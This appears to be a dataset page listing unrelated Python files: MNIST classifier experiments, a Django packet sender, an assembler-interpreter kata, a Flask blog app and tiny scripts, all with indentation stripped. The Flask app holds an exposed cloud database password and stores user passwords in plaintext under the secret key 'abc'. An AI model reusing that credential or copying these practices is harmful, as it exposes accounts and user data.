print("This is scaled SGD accuracy:\n", scaled_score)
# Error evaluating using confusion matrix
y_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)
conf_mat = confusion_matrix(y_train, y_train_pred)
print("Confusion mat:\n", conf_mat)
# confusion_matrix_image representation
def plot_confusion_matrix(matrix):
"""If you prefer color and a colorbar"""
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(111)
cax = ax.matshow(matrix)
fig.colorbar(cax)
plt.matshow(conf_mat, cmap=plt.cm.gray)
#save_fig("confusion_matrix_plot", tight_layout=False)
#plt.show()
row_sums = conf_mat.sum(axis=1, keepdims=True)
# deviding by number of images in the corresponding class
# to compare error rates instead of absolute number of errors
norm_conf_mx = conf_mat / row_sums
# fill diagonal with zeros to keep only the errors
np.fill_diagonal(norm_conf_mx, 0)
# rows - actual classes , columns - predicted classes
plt.matshow(norm_conf_mx, cmap=plt.cm.gray)
#plt.show()
# Multilabel classification
y_train_large = (y_train >= 7)
y_train_odd = (y_train % 2 == 1)
y_multilabel = np.c_[y_train_large, y_train_odd]
knn_clf = KNeighborsClassifier()
knn_clf.fit(X_train, y_multilabel)
is_large_from7_is_odd = knn_clf.predict([some_digit])
print("(large from 7?,is odd?) knn predictions:\n", is_large_from7_is_odd)
# y_train_knn_pred = cross_val_predict(knn_clf, X_train, y_multilabel, cv=3, n_jobs=-1)
# f1_score(y_multilabel, y_train_knn_pred, average="macro")
is_exist = os.path.exists("./knn_model.pickle") and os.path.exists("./grid_search.pickle")
if is_exist:
with open("./knn_model.pickle", "rb") as model_file:
knn_clf = pickle.load(model_file)
with open("grid_search.pickle", "rb") as grid_search_file:
grid_search = pickle.load(grid_search_file)
else:
# 1 MNIST Classifier With Over 97% Accuracy
param_grid = [{'weights': ["uniform", "distance"], 'n_neighbors': [3, 4, 5]}]
knn_clf = KNeighborsClassifier()
grid_search = GridSearchCV(knn_clf, param_grid, cv=5, verbose=3, n_jobs=-1)
grid_search.fit(X_train, y_train)
with open("./knn_model.pickle", "wb") as model_file:
pickle.dump(knn_clf, model_file)
with open("./grid_search.pickle", "wb") as grid_search_file:
pickle.dump(grid_search, grid_search_file)
best_param = grid_search.best_params_
print("best knn parameters:", best_param)
y_pred = grid_search.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print("this is KNN accuracy score:", accuracy)
#2
# Data augmentation
def shift_image(image, dx, dy):
image = image.reshape((28, 28))
shifted_image = shift(image, [dy, dx], cval=0, mode="constant")
return shifted_image.reshape([-1])
X_train_augmented = [image for image in X_train]
y_train_augmented = [label for label in y_train]
for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
for image, label in zip(X_train, y_train):
X_train_augmented.append(shift_image(image, dx, dy))
y_train_augmented.append(label)
X_train_augmented = np.array(X_train_augmented)
y_train_augmented = np.array(y_train_augmented)
shuffle_idx = np.random.permutation(len(X_train_augmented))
X_train_augmented = X_train_augmented[shuffle_idx]
y_train_augmented = y_train_augmented[shuffle_idx]
knn_clf = KNeighborsClassifier(**grid_search.best_params_)
knn_clf.fit(X_train_augmented, y_train_augmented)
y_pred = knn_clf.predict(X_test)
ac_score = accuracy_score(y_test, y_pred)
print("Accuracy:\n", ac_score)
|
import threading
import time
import datetime
from django.conf import settings
from pack_llama import models
from request_service import Request
class PromiseService(object):
def __init__(self):
try:
self.__interval = settings.DB_CHECK_INTERVAL
except:
self.__interval = 300
tr = threading.Thread(target=self.send_packets)
tr.daemon = True
tr.start()
print "Promise Service is started at %s" % (str(datetime.datetime.now()))
def send_packets(self):
while 1:
print "Thread is still running! time: %s" % (str(datetime.datetime.now()))
try:
packs = models.Pack.objects.filter(is_sent = False)
if packs.exists():
for p in packs.iterator():
p.message.open()
if Request().send(p.queue.destination_url,'POST', str(p.message.read())):
p.is_sent = True
p.save()
time.sleep(self.__interval)
except Exception as ex:
print "Can't prepare pack for sending to server! ex = %s" % (str(ex))
|
def simple_assembler(program):
program = [x.split() for x in program]
output = {}
cmd = 0
while cmd < len(program):
if program[cmd][0] == 'mov':
try:
output[program[cmd][1]] = int(program[cmd][2])
except ValueError:
output[program[cmd][1]] = output[program[cmd][2]]
elif program[cmd][0] == 'inc':
output[program[cmd][1]] += 1
elif program[cmd][0] == 'dec':
output[program[cmd][1]] -= 1
elif program[cmd][0] == 'jnz':
if output.get(program[cmd][1]) == 0 or program[cmd][1] == 0:
pass
else:
cmd += int(program[cmd][2]) - 1
cmd += 1
return output
'''
This is the first part of this kata series. Second part is here.
We want to create a simple interpreter of assembler which will support
the following instructions:
mov x y - copies y (either a constant value or the content of a register)
into register x
inc x - increases the content of register x by one
dec x - decreases the content of register x by one
jnz x y - jumps to an instruction y steps away (positive means forward,
negative means backward), but only if x (a constant or a register) is not zero
Register names are alphabetical (letters only). Constants are always integers
(positive or negative).
Note: the jnz instruction moves relative to itself. For example, an offset of -1
would continue at the previous instruction, while an offset of 2 would skip over
the next instruction.
The function will take an input list with the sequence of the program instructions
and will return a dictionary with the contents of the registers.
Also, every inc/dec/jnz on a register will always be followed by a mov on the
register first, so you don't need to worry about uninitialized registers.
Example
simple_assembler(['mov a 5','inc a','dec a','dec a','jnz a -1','inc a'])
visualized:
mov a 5
inc a
dec a
dec a
jnz a -1
inc a
The above code will:
set register a to 5,
increase its value by 1,
decrease its value by 2,
then decrease its value until it is zero (jnz a -1 jumps to the previous
instruction if a is not zero)
and then increase its value by 1, leaving register a at 1
So, the function should return
{'a': 1}
'''
|
from flask import Flask, render_template, jsonify, request,session,redirect,url_for
from models import *
import os
PEOPLE_FOLDER = os.path.join('static', 'img')
app = Flask(__name__)
# app.config["SQLALCHEMY_DATABASE_URI"] = r"postgres://qgorardefomjqz:ebcb07859a907fe7ab36b6738c6e8f4d475e6a5457a4d9c8be656c9350b45e29@ec2-54-161-208-31.compute-1.amazonaws.com:5432/d2metr5n3omthh"
app.config["SQLALCHEMY_DATABASE_URI"] = r"postgresql://postgres:1@localhost:5432/project1"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config['UPLOAD_FOLDER'] = PEOPLE_FOLDER
app.secret_key = "abc"
db.init_app(app)
list_drone = []
def main():
db.create_all()
@app.route("/")
def home():
return render_template("login.html")
@app.route("/login", methods=["POST"])
def register():
"""Register."""
# Get form information.
name = request.form.get("name")
password = request.form.get("password")
# Add user
if User.query.filter_by(name=name).first() is None:
new_user = User(name=name,password=password)
db.session.add(new_user)
db.session.commit()
return render_template("login.html")
else:
return render_template("error.html", message="The name has already existed.")
@app.route("/home", methods=["POST"])
def login():
"""Login."""
# Get form information.
name = request.form.get("name")
password = request.form.get("password")
session['username'] = name
# if 'username' in session:
# user = session['username']
# print(user)
# print("adfadfkasndfoasdnfasdf")
# # Add user
if User.query.filter_by(name=name,password=password).first() is None:
return render_template("register.html")
else:
full_filename = os.path.join(app.config['UPLOAD_FOLDER'],'first.jpg')
return render_template("home.html",user_image=full_filename,name=name)
@app.route("/register")
def turn_back_toregister():
return render_template("register.html")
@app.route("/home")
def logout():
session.pop('username', None)
return render_template("login.html")
@app.route('/home2',methods=["POST"])
def searching():
selection = request.form.get("selection")
search = request.form.get("search")
# print(selection)
# print(search)
message = True
if selection == "Users":
results = Blog.query.filter_by(Author=search).all()
elif selection == "Rating":
results = Blog.query.filter_by(ratings_count=search).all()
elif selection == "Title":
results = Blog.query.filter_by(title=search).all()
elif selection == "Date":
results = Blog.query.filter_by(date=search).all()
if results == []:
message = False
full_filename = os.path.join(app.config['UPLOAD_FOLDER'],'first.jpg')
return render_template("home.html",user_image=full_filename,message=message)
return render_template("resultSearching.html",results=results)
@app.route("/blog/<string:title>",methods=["POST","GET"])
def blogRender(title):
user_name = session['username']
# title = request.args.get("title")
if request.method == "GET":
blog = Blog.query.filter_by(title=title).all()
author = blog[0].Author
title = blog[0].title
content = blog[0].content
comments=Comment.query.filter_by(blog=title).all()
print("-----------getcomment------------")
print(comments)
message = True
if len(comments) == 0:
message = False
alert = False
drone = 0
if request.method == "POST":
# print("vo duoc roi ne leu leu")
content_comment = request.form.get("content")
content_comment = request.form.get("content_comment")
drone = request.form.get("drone")
drone = int(drone)
list_drone.append(drone)
drone = sum(list_drone)/ len(list_drone)
# print("--------------title---------------")
# print(title)
author = request.form.get("author")
blog = Blog.query.filter_by(title=title).all()[0]
print("--------------blog---------------")
print(blog)
content = blog.content
print("--------------content---------------")
print(content)
comments=Comment.query.filter_by(blog=title).all()
print("--------------comment---------------")
print(comments)
message = True
check_comment = Comment.query.filter_by(user=user_name).all()
print("--------------check-content---------------")
print(check_comment)
if len(check_comment)>0:
alert = True
else:
print(88888888)
new_comment = Comment(blog=title,content=content_comment,user=user_name)
db.session.add(new_comment)
db.session.commit()
alert = False
comments = Comment.query.filter_by(user=user_name).all()
print(alert) # return redirect(url_for('blogRender',title=title))
return render_template("blog.html",title=title,content=content,author=author,comments=comments,message=message,alert=alert,drone=drone)
@app.route("/blog/<int:id>",methods=["GET"])
def blog_api(id):
"""Return details about a single flight."""
# Make sure blog exists.
blog = Blog.query.get(id)
print("khoa oc choooooooooooooooooooooooooooooooooooo")
print(blog)
print(type(blog))
if blog is None:
return jsonify({"error": "Invalid blog"}), 404
# Get all passengers.
comments = blog.comments
names = []
for comment in comments:
names.append(comment.content)
return jsonify({
"Author": blog.Author,
"Title": blog.title,
"Comment": names
})
if __name__ == "__main__":
with app.app_context():
main() |
A=int(input("A= "))
#print(A%2!=0)
print((A%2)>0) |
import relative_imports.lcls2_pgp_pcie_app.axipcie as axipcie
axipcie.func()
|
import board
import neopixel
import time
pixels = neopixel.NeoPixel(board.D18, 20)
for i in range(10):
pixels[i*2] = (128,0,128)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.